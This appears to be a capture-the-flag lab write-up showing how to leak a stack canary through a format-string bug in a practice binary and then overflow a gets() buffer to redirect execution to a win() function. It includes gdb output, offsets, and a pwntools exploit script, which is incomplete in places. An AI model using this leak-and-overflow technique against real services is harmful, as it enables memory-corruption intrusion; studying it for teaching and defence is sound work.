
Leaking a stack canary to allow for buffer overflows.

This problem is the first instance where the stack protector, called the canary is enabled. We need to figure out how to beat that canary to perform a buffer overflow.

When we run checksec on the binary, we notice that the canary is enabled.

[*] '/home/joybuzzer/Documents/vunrotc/public/binex/04-canaries/canary/src/canary'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

PIE is still disabled, meaning we can still use the same techniques we used in the previous binary. However, we can't use the same techniques to overflow the stack. Let's see what happens when we try to overflow the stack.

$ python -c "print('A'*1000)" | ./canary
Hello, what is your name?
How can I help you today?
*** stack smashing detected ***: terminated
zsh: done                           python3 -c "print('A' * 1000)" | 
zsh: IOT instruction (core dumped)  ./canary

A stack smashing detected statement in the output indicates that we overwrote the canary. We need to determine how to beat the canary, and then we will proceed as usual.

Static Analysis

It seems that our primary functions are main, read_in, and win.

  • win seems only to print the contents of the flag.

  • main immediately calls read_in, then has a puts statement. We can use gdb to show that reads "You lose!".

read_in does a list of things, so let's break it down further. Checking the arguments as we scroll through gdb:

  • puts("Hello, what is your name?")

    puts@plt (
      [sp + 0x0] = 0x0804a008 → "Hello, what is your name?"
  • gets(ebp-0x4c)

    gets@plt (
     [sp + 0x0] = 0xffffd54c → 0xf7fc66d0 → 0x0000000e
  • printf(ebp-0x4c)

    printf@plt (
     [sp + 0x0] = 0xffffd54c → 0xf7006968 ("hi"?)
  • puts("How can I help you today?")

    puts@plt (
     [sp + 0x0] = 0x0804a023 → "How can I help you today?"
  • gets(ebp-0x4c)

    gets@plt (
     [sp + 0x0] = 0xffffd54c → 0xf7006968 ("hi"?)

After this last check, we see that the canary check is made:

0x08049283 <+189>:	mov    eax,DWORD PTR [ebp-0xc]
0x08049286 <+192>:	sub    eax,DWORD PTR gs:0x14
0x0804928d <+199>:	je     0x8049294 <read_in+206>
0x0804928f <+201>:	call   0x8049310 <__stack_chk_fail_local>

From this, we gather a few things:

  • We write to the same buffer both times that we write to memory.

  • The format string vulnerability in the first read means we can leak the canary.

  • The existence of a second read means we can pass in a second payload that uses the canary to pass the check, then performs a buffer overflow.

  • The canary is stored at ebp-0xc.

Payload Part 1: Leaking the Canary

We know the canary is stored on the stack at ebp-0xc. We will use a format string to leak the canary to standard output and then pass that canary to the second payload.

There are two ways to find the offset on the stack that the canary is stored at:

  1. Use gdb to set a breakpoint before the gets call, then count the number of DWORD frames between the stack pointer and canary.

  2. Check the location of the stack pointer at the start of the read_in function, account for the number of operations on the stack pointer, then count the number of DWORD frames between the stack pointer and canary.

The first one is by far easier and more practical.

gef➤  canary
[+] The canary of process 44910 is at 0xffffd80b, value is 0x8fdba200
gef➤  x/40wx $esp
0xffffd530:	0xffffd54c	0x00000001	0xf7ffda40	0x080491d2
0xffffd540:	0xf7fc4540	0xffffffff	0x08048034	0xf7fc66d0
0xffffd550:	0xf7ffd608	0x00000020	0x00000000	0xffffd750
0xffffd560:	0x00000000	0x00000000	0x01000000	0x0000000b
0xffffd570:	0xf7fc4540	0x00000000	0xf7c184be	0xf7e2a054
0xffffd580:	0xf7fbe4a0	0xf7fd6f80	0xf7c184be	0x8fdba200
0xffffd590:	0xffffd5d0	0x0804c000	0xffffd5a8	0x080492b8
0xffffd5a0:	0xffffd5c0	0xf7e2a000	0xf7ffd020	0xf7c21519
0xffffd5b0:	0xffffd82e	0x00000070	0xf7ffd000	0xf7c21519
0xffffd5c0:	0x00000001	0xffffd674	0xffffd67c	0xffffd5e0

gdb tells us that the canary is at 0xffffd80b. If we count from our location to the canary, we see that it is 23 DWORDs away. We can verify this using the format string:

$ ./canary
Hello, what is your name?

This appears to work! Let's turn this into a pwntools script:

canary = int(p.recvline().strip(), 16)

Payload Part 2: Overflowing the Buffer

Now that we have the canary, we can overflow the buffer. We need to do this in two steps:

  1. Write data until we reach the canary, then write the canary to the stack (so it doesn't get modified).

  2. Write data from the canary to the return pointer, then overwrite the return pointer with the address of win().

We discussed earlier that the canary is stored at ebp-0xc. Based on the argument passed to gets(), we start writing at ebp-0x4c. This means we need to write 0x40=64 bytes of data before reaching the canary.

Our payload here could look like this:

payload = b'A' * 0x40
payload += p32(canary)

Then, we need to write from the canary to the return pointer. The canary sits at ebp-0xc, and the return pointer always sits at ebp+0x4 (because the base pointer is at ebp+0x0). Remember that the canary takes four bytes itself, meaning we start to write at ebp-0x8. This means we need to write 0xc bytes of data to reach the return pointer.

Our payload here could look like this:

payload += b'B' * 0xc
payload += p32(win)

Why did I use "B" this time?

I can use any value to fill the empty space. I choose to use a different value for debugging purposes. In the case that my payload is wrong, it's easier to tell if I overfilled or underfilled the buffer by using two different values.

From here, we put it all together into one large payload and send it off!
from pwn import *

proc = remote('', 4100)

# leak the canary
payload = b'%23$p'

# get output to store the canary
leak = proc.recvline().strip()
leak = int(leak.decode(), 16)

print("Canary Leaked:", hex(leak))

# build the payload with the canary
payload = b'A' * 0x40
payload += p32(leak)
payload += b'A' * 0xc
payload += p32(0x080492d9)


Running this gets us our flag.

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